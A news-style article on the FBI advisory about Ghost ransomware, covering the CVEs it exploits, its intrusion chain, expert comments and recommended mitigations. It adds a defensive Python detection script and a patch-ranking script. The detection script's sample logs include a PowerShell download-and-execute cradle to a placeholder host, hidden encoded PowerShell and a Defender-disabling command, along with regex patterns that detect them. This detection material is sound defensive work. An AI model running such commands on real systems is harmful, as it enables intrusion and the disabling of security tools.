FBI Urges Immediate Backup: Alert Issued Over Potent Ransomware Threats
In the ever-evolving landscape of cyber threats, it's crucial to acknowledge that phishing isn't the only danger lurking around the corner. The FBI recently issued a critical advisory regarding a relentless ransomware campaign known as Ghost. This campaign, run by attackers based in China, exploits known vulnerabilities in software and firmware rather than relying on the phishing techniques that dominate most cybersecurity discussions.
The joint security advisory, titled AA25-050A and issued on February 19, 20XX, alerts organizations worldwide about this malicious group, which has targeted numerous industries across more than 70 countries. The Ghost actors exploit public-facing applications affected by multiple Common Vulnerabilities and Exposures (CVEs), including:
- CVE-2009-3960
- CVE-2010-2861
- CVE-2018-13379
- CVE-2019-0604
- CVE-2021-31207
- CVE-2021-34473
- CVE-2021-34523
The first set of digits in each CVE number indicates the year the vulnerability was reported and, in most cases, the year the vendor patched it. Ghost exploits these vulnerabilities, many of which have remained unpatched on victim systems for over a decade, to gain access to internet-facing servers and ultimately deploy its ransomware payload.
The attack chain begins with the threat actors uploading a web shell to a compromised server, then using the Windows command prompt and PowerShell to download and execute a Cobalt Strike Beacon on the target system. They use Cobalt Strike functions to steal credentials, impersonate the SYSTEM account, and disable security tools such as Windows Defender.
Unlike many other ransomware operations, Ghost does not engage in significant data theft. The FBI has observed minimal evidence of substantial amounts of intellectual property or personally identifiable information being stolen from compromised organizations. As such, the group's primary focus appears to be the ransomware payload itself.
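The intrusion chain described above (web shell on an internet-facing server, a PowerShell download cradle that fetches the Beacon, then Defender being switched off) leaves a recognisable trail in endpoint telemetry. The following script is an added example, not code from the advisory or from any vendor: it runs simple detections over constructed log lines whose layout loosely imitates Sysmon process-creation events, PowerShell script-block logging, and the Defender "real-time protection disabled" event. The web-server process names, the `source|key=value` line format, and every hostname, path and URL in the sample data are assumptions made for the example.

```python
"""Detection sketch for the Ghost intrusion chain described in advisory AA25-050A.

Added example. The log lines below are CONSTRUCTED for illustration (they are not
from the advisory or any real incident). Each line is "<source>|key=value|..." where
<source> is one of: sysmon1 (process creation), ps4104 (PowerShell script block),
defender5001 (real-time protection disabled). The field names mimic those event
types but the format itself is an assumption of this example.
"""
import re

SAMPLE_LOGS = [
    # web server worker spawning a command shell: typical of a web shell being used
    "sysmon1|Image=C:\\Windows\\System32\\cmd.exe|ParentImage=C:\\Windows\\System32\\inetsrv\\w3wp.exe|CommandLine=cmd.exe /c whoami",
    # cmd.exe launching hidden, encoded PowerShell
    "sysmon1|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=powershell -nop -w hidden -enc AAAA",
    # download-and-execute cradle (URL is a placeholder, .invalid TLD never resolves)
    "ps4104|ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')",
    # tampering with Defender real-time protection
    "ps4104|ScriptBlockText=Set-MpPreference -DisableRealtimeMonitoring $true",
    "defender5001|Message=Real-time protection is disabled",
    # benign noise that must NOT trigger
    "sysmon1|Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=notepad.exe",
    "ps4104|ScriptBlockText=Get-ChildItem C:\\Temp",
]

# Assumed set of web-server worker processes that should never spawn a shell.
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe", "coldfusion.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}

DOWNLOAD_CRADLE = re.compile(r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)", re.I)
INVOKE_EXPR = re.compile(r"(\biex\b|invoke-expression)", re.I)
DEFENDER_TAMPER = re.compile(r"set-mppreference.*-disable\w+", re.I)
ENCODED_CMD = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)


def parse(line):
    """Split one constructed log line into (source, {field: value})."""
    source, _, rest = line.partition("|")
    fields = dict(kv.split("=", 1) for kv in rest.split("|") if "=" in kv)
    return source, fields


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def analyze(lines):
    """Return a list of (detection_name, evidence) tuples for the given log lines."""
    findings = []
    for line in lines:
        source, f = parse(line)
        if source == "sysmon1":
            child = basename(f.get("Image", ""))
            parent = basename(f.get("ParentImage", ""))
            if parent in WEB_SERVER_PARENTS and child in SHELL_CHILDREN:
                findings.append(("webshell_spawn", f"{parent} -> {child}"))
            if child in SHELL_CHILDREN and ENCODED_CMD.search(f.get("CommandLine", "")):
                findings.append(("encoded_powershell", f.get("CommandLine", "")))
        elif source == "ps4104":
            text = f.get("ScriptBlockText", "")
            # a download cradle is only flagged when the fetched content is also executed
            if DOWNLOAD_CRADLE.search(text) and INVOKE_EXPR.search(text):
                findings.append(("download_cradle", text))
            if DEFENDER_TAMPER.search(text):
                findings.append(("defender_tamper", text))
        elif source == "defender5001":
            findings.append(("defender_rtp_disabled", f.get("Message", "")))
    return findings


def summarize(findings):
    """Count hits per detection so triage can see the whole chain at a glance."""
    counts = {}
    for kind, _ in findings:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


def chain_observed(findings, required=("webshell_spawn", "download_cradle", "defender_tamper")):
    """True when every stage of the described chain has at least one hit."""
    kinds = {k for k, _ in findings}
    return all(r in kinds for r in required)


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOGS)
    for kind, evidence in hits:
        print(f"{kind:24} {evidence}")
    print("full chain observed:", chain_observed(hits))
```

Any one of these detections on its own is noisy (administrators do run `Set-MpPreference`, and build servers do download scripts); the value is in correlating them on the same host within a short window, which `chain_observed` does in the simplest possible way. In a real deployment the process-lineage rule is the highest-signal piece: an IIS or ColdFusion worker should essentially never have `cmd.exe` or `powershell.exe` as a child.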
Expert Perspectives on Ghost Ransomware
Several security professionals shared their insights on the FBI's Ghost warning:
- Juliette Hudson, CybaVerse CTO: The Ghost ransomware group signifies a significant threat that organizations must actively protect against. Hudson highlighted the importance of prioritizing patching and remediation efforts to address the exploited CVEs.
- Darren Guccione, Keeper Security CEO: The Ghost ransomware campaign highlights the urgent need for proactive risk management, with security leaders ensuring that software, firmware, and identity systems are continuously updated and hardened against exploitation.
- Joe Silva, Spektion CEO: The attacks may appear to capitalize on patch fatigue, signifying a need for real-time, contextual insights into system behavior based on actual risks rather than potential risks that overwhelm security teams.
- Rom Carmel, Apono CEO: The Ghost ransomware attacks accentuate the importance of authentication and precise, rightsized privileges, limiting the availability of high-value resources with strong multi-factor authentication and least-privilege access controls.
- Tim Mackey, Black Duck Head of Software Supply Chain Risk Strategy: Organizations must work closely with their suppliers to ensure long-term operational and risk mitigation plans, addressing vulnerabilities and sharing threat scenario data.
Four Urgent Steps to Minimize Ransomware Risks
The FBI has urged organizations to take the following measures to mitigate Ghost ransomware threats:
- Regular system backups, stored separately and not accessible by compromised network devices
- Timely application of security updates to operating systems, software, and firmware
- Segmented networks, restricting lateral movement for infected devices
- Implementation of Phishing-Resistant Multi-Factor Authentication for all privileged accounts and email services
Promoting phishing awareness, applying the principle of least privilege, and disabling unused ports are additional recommended strategies. The FBI encourages organizations not to pay the ransom, as payment does not guarantee file recovery and may only encourage further attacks.
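The "timely application of security updates" step is only actionable once vulnerability-scan output has been ranked, and the advisory's own CVE list plus the year encoded in each CVE identifier (explained earlier on this page) is enough to do that. The script below is an added example, not an FBI or vendor tool: it takes constructed scanner findings (hostname, whether the host is internet-facing, CVE id), marks the ones that appear in the advisory's exploited list, and orders them so the oldest known-exploited flaws on exposed hosts come first. The hostnames, the exposure flags and the placeholder `CVE-2023-00000` id are invented for the example; the seven exploited CVEs are the ones the page lists.

```python
"""Rank scanner findings against the CVEs advisory AA25-050A lists as exploited by Ghost.

Added example. GHOST_EXPLOITED_CVES is copied from the advisory's list as given on
the page; SAMPLE_FINDINGS is CONSTRUCTED (hostnames, exposure flags and the
placeholder CVE-2023-00000 are not real data).
"""
from datetime import date

GHOST_EXPLOITED_CVES = {
    "CVE-2009-3960", "CVE-2010-2861", "CVE-2018-13379", "CVE-2019-0604",
    "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523",
}

# Constructed scanner output: (hostname, internet_facing, cve_id).
SAMPLE_FINDINGS = [
    ("mail-01", True, "CVE-2021-34473"),
    ("mail-01", True, "CVE-2021-34523"),
    ("vpn-gw", True, "CVE-2018-13379"),
    ("intranet-sp", False, "CVE-2019-0604"),
    ("cf-legacy", True, "CVE-2010-2861"),
    ("build-42", False, "CVE-2023-00000"),  # placeholder id, not a real CVE, not on the list
]


def cve_year(cve_id):
    """The first numeric group of a CVE id is the year it was reported."""
    parts = cve_id.split("-")
    if len(parts) != 3 or parts[0] != "CVE" or not parts[1].isdigit():
        raise ValueError(f"malformed CVE id: {cve_id}")
    return int(parts[1])


def priority(finding, today_year=None):
    """Return (tier, age_years).

    Tier 0: on the exploited list and internet-facing (patch now).
    Tier 1: on the exploited list but internal only.
    Tier 2: everything else, handled by the normal patch cycle.
    """
    year = today_year or date.today().year
    _host, exposed, cve = finding
    age = year - cve_year(cve)
    if cve in GHOST_EXPLOITED_CVES:
        tier = 0 if exposed else 1
    else:
        tier = 2
    return tier, age


def patch_plan(findings, today_year=None):
    """Order findings: lowest tier first, then oldest CVE first, then by hostname."""
    scored = [(priority(f, today_year), f) for f in findings]
    scored.sort(key=lambda s: (s[0][0], -s[0][1], s[1][0]))
    return [(f[0], f[2], tier, age) for (tier, age), f in scored]


def unpatched_for_over_a_decade(findings, today_year=None):
    """Exploited-list CVEs that are ten or more years old: the 'patch fatigue' backlog."""
    return [
        f[2] for f in findings
        if f[2] in GHOST_EXPLOITED_CVES and priority(f, today_year)[1] >= 10
    ]


if __name__ == "__main__":
    for host, cve, tier, age in patch_plan(SAMPLE_FINDINGS):
        print(f"tier {tier}  {age:2d}y old  {host:12} {cve}")
    print("decade-old exploited CVEs:", unpatched_for_over_a_decade(SAMPLE_FINDINGS))
```

The ordering deliberately puts age ahead of CVSS-style severity: the advisory's point is that these are old, well-understood flaws that attackers keep finding on exposed hosts, so a ten-year-old ColdFusion bug on an internet-facing server outranks a newer, higher-scored issue on an internal build box. The `today_year` parameter exists so the ranking is reproducible in tests rather than drifting with the wall clock.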
In conclusion, cybersecurity professionals should be vigilant in addressing the exploited vulnerabilities and complying with recommended mitigation strategies to protect their organizations against Ghost ransomware attacks.
The FBI's ransomware warning underscores the need for organizations to be proactive in addressing vulnerable CVEs, such as CVE-2021-34473, exploited by the Ghost ransomware group. Ignoring these vulnerabilities can lead to serious consequences, as seen in the ongoing campaign targeting over 70 countries. The FBI security advisory encourages regular system backups, timely application of security updates, and the implementation of multi-factor authentication to minimize ransomware risks.
The FBI's warning about Ghost ransomware highlights the importance of prioritizing patching and remediation efforts, especially for well-known vulnerabilities like CVE-2010-2861. Cybersecurity experts urge organizations to focus on real-time, contextual insights into system behavior, limit high-value resource access with multi-factor authentication, and work closely with suppliers to ensure long-term risk mitigation plans.
The FBI also advises against paying ransoms, since payment does not guarantee file recovery and may only encourage further attacks. It also recommends segmenting networks to restrict lateral movement by infected devices, and promoting phishing awareness, as additional ransomware defenses.
With recent layoffs, many organizations may be understaffed in their cybersecurity efforts, making it even more critical to allocate resources effectively and prioritize the recommended mitigations. The consequences of ignoring these warnings can be devastating, as the ongoing Ghost ransomware campaign demonstrates.